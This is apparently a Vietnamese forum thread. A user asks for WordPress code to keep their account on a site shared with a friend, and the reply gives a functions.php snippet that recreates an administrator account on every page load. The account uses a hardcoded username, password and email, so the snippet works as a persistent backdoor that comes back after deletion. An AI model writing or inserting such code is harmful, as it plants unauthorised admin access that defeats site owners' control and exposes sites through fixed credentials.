Cho em xin cái code tự động tao user trong function.php wordpress với, em cho code đứa bạn, sợ nó xóa user của em, em muốn dù nó xóa đi cỡ nào, thì web sẽ tự động tạo user mới ấy. Cảm ơn các bạn
Của em đây nhé Minh. Chèn nó vào function.php của themes nhé, web sẽ tự động tạo user này nếu không tồn tại. Mã: function wpb_itseovn_admin_account(){ $user = 'itseovn'; $pass = 'itseovn@124'; $email = 'info@itseovn.com'; if ( !username_exists( $user ) && !email_exists( $email ) ) { $user_id = wp_create_user( $user, $pass, $email ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } add_action('init','wpb_itseovn_admin_account');